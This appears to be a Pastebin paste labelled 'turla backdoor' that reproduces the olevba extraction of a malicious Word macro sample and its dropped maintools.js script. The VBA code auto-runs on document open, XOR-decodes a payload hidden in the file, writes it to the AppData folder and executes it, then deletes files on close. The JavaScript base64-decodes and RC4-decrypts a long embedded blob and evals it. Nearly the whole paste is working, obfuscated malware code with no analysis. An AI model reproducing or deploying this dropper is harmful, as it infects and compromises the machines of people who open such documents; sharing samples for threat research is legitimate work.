API tools faq
paste
Advertisement
hollerith

turla backdoor

hollerith
Oct 4th, 2017
1,114
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 34.40 KB | None | 0 0
raw download clone embed print report
  1. ## Uploaded by @JohnLaTwC
  2. ## Sample Hash: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
  3.  
  4. ## ---- Macro
  5. olevba 0.50 - http://decalage.info/python/oletools
  6. Flags        Filename                                                        
  7. -----------  -----------------------------------------------------------------
  8. OLE:MASI-B-- ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
  9. ===============================================================================
  10. FILE: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751
  11. Type: OLE
  12. -------------------------------------------------------------------------------
  13. VBA MACRO ThisDocument.cls
  14. in file: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751 - OLE stream: u'Macros/VBA/ThisDocument'
  15. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  16. (empty macro)
  17. -------------------------------------------------------------------------------
  18. VBA MACRO Module1.bas
  19. in file: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751 - OLE stream: u'Macros/VBA/Module1'
  20. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  21. Public OBKHLrC3vEDjVL As String
  22. Public B8qen2T433Ds1bW As String
  23. Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
  24. Dim THQNfU76nlSbtJ5nX8LY6 As Byte
  25. THQNfU76nlSbtJ5nX8LY6 = 45
  26. For i = 0 To M5wI32R3VF2g5B21EK4d - 1
  27. EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
  28. THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
  29. Next i
  30. Q7JOhn5pIl648L6V43V = True
  31. End Function
  32. Sub AutoClose()
  33. On Error Resume Next
  34. Kill OBKHLrC3vEDjVL
  35. On Error Resume Next
  36. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
  37. R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
  38. Set R7Ks7ug4hRR2weOy7 = Nothing
  39. End Sub
  40. Sub AutoOpen()
  41. On Error GoTo MnOWqnnpKXfRO
  42. Dim NEnrKxf8l511
  43. Dim N18Eoi6OG6T2rNoVl41W As Long
  44. Dim M5wI32R3VF2g5B21EK4d As Long
  45. N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
  46. NEnrKxf8l511 = FreeFile
  47. Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
  48. Dim E2kvpmR17SI() As Byte
  49. ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
  50. Get #NEnrKxf8l511, 1, E2kvpmR17SI
  51. Dim KqG31PcgwTc2oL47hjd7Oi As String
  52. KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
  53. Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
  54. Dim VUy5oj112fLw51h6S
  55. Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
  56. VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
  57. Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
  58. Dim Y5t4Ul7o385qK4YDhr
  59. If I4j833DS5SFd34L3gwYQD.Count = 0 Then
  60. GoTo MnOWqnnpKXfRO
  61. End If
  62. For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
  63. Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
  64. Exit For
  65. Next
  66. Dim Wk4o3X7x1134j() As Byte
  67. Dim KDXl18qY4rcT As Long
  68. KDXl18qY4rcT = 16827
  69. ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
  70. Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
  71. If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
  72. GoTo MnOWqnnpKXfRO
  73. End If
  74. B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
  75. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
  76. If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
  77. B8qen2T433Ds1bW = Environ("appdata")
  78. End If
  79. Set R7Ks7ug4hRR2weOy7 = Nothing
  80. Dim K764B5Ph46Vh
  81. K764B5Ph46Vh = FreeFile
  82. OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "maintools.js"
  83. Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
  84. Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
  85. Close #K764B5Ph46Vh
  86. Erase Wk4o3X7x1134j
  87. Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
  88. R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " EzZETcSXyKAdF_e5I2i1"
  89. ActiveDocument.Save
  90. Exit Sub
  91. MnOWqnnpKXfRO:
  92. Close #K764B5Ph46Vh
  93. ActiveDocument.Save
  94. End Sub
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  104. Attribute VB_Name SHA1  
  105. 5BD2E2B8DDC65931704C8C3EA57ADC2BB778F66A
  106.  
  107. ##---- maintools.js
  108. try {
  109.     var wvy1 = WScript.Arguments;
  110.     var ssWZ = wvy1(0);
  111.     var ES3c = y3zb();
  112.     ES3c = LXv5(ES3c);
  113.     ES3c = CpPT(ssWZ, ES3c);
  114.     eval(ES3c);
  115. } catch (e) {
  116.     WScript.Quit();
  117. }
  118.  
  119. function MTvK(CgqD) {
  120.     var XwH7 = CgqD.charCodeAt(0);
  121.     if (XwH7 === 0x2B || XwH7 === 0x2D) return 62
  122.     if (XwH7 === 0x2F || XwH7 === 0x5F) return 63
  123.     if (XwH7 < 0x30) return -1
  124.     if (XwH7 < 0x30 + 10) return XwH7 - 0x30 + 26 + 26
  125.     if (XwH7 < 0x41 + 26) return XwH7 - 0x41
  126.     if (XwH7 < 0x61 + 26) return XwH7 - 0x61 + 26
  127. }
  128.  
  129. function LXv5(d27x) {
  130.     var LUK7 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  131.     var i;
  132.     var j;
  133.     var n6T8;
  134.     if (d27x.length % 4 > 0)
  135.         return;
  136.     var CHlB = d27x.length;
  137.     var V8eR = d27x.charAt(CHlB - 2) === '=' ? 2 : d27x.charAt(CHlB - 1) === '=' ? 1 : 0
  138.    var mjqo = new Array(d27x.length * 3 / 4 - V8eR);
  139.     var z8Ht = V8eR > 0 ? d27x.length - 4 : d27x.length;
  140.     var t2JG = 0;
  141.  
  142.     function XGH6(b0tQ) {
  143.         mjqo[t2JG++] = b0tQ;
  144.     }
  145.     for (i = 0, j = 0; i < z8Ht; i += 4, j += 3) {
  146.         n6T8 = (MTvK(d27x.charAt(i)) << 18) | (MTvK(d27x.charAt(i + 1)) << 12) | (MTvK(d27x.charAt(i + 2)) << 6) | MTvK(d27x.charAt(i + 3));
  147.         XGH6((n6T8 & 0xFF0000) >> 16)
  148.         XGH6((n6T8 & 0xFF00) >> 8)
  149.         XGH6(n6T8 & 0xFF)
  150.     }
  151.     if (V8eR === 2) {
  152.         n6T8 = (MTvK(d27x.charAt(i)) << 2) | (MTvK(d27x.charAt(i + 1)) >> 4)
  153.         XGH6(n6T8 & 0xFF)
  154.     } else if (V8eR === 1) {
  155.         n6T8 = (MTvK(d27x.charAt(i)) << 10) | (MTvK(d27x.charAt(i + 1)) << 4) | (MTvK(d27x.charAt(i + 2)) >> 2)
  156.         XGH6((n6T8 >> 8) & 0xFF)
  157.         XGH6(n6T8 & 0xFF)
  158.     }
  159.     return mjqo
  160. }
  161.  
  162. function CpPT(bOe3, F5vZ) {
  163.     var AWy7 = [];
  164.     var V2Vl = 0;
  165.     var qyCq;
  166.     var mjqo = '';
  167.    for (var i = 0; i < 256; i++) {
  168.         AWy7[i] = i;
  169.     }
  170.     for (var i = 0; i < 256; i++) {
  171.         V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256;
  172.         qyCq = AWy7[i];
  173.         AWy7[i] = AWy7[V2Vl];
  174.         AWy7[V2Vl] = qyCq;
  175.     }
  176.     var i = 0;
  177.     var V2Vl = 0;
  178.     for (var y = 0; y < F5vZ.length; y++) {
  179.         i = (i + 1) % 256;
  180.         V2Vl = (V2Vl + AWy7[i]) % 256;
  181.         qyCq = AWy7[i];
  182.         AWy7[i] = AWy7[V2Vl];
  183.         AWy7[V2Vl] = qyCq;
  184.         mjqo += String.fromCharCode(F5vZ[y] ^ AWy7[(AWy7[i] + AWy7[V2Vl]) % 256]);
  185.     }
  186.     return mjqo;
  187. }
  188.  
  189. function y3zb() {
  190.     var qGxZ = "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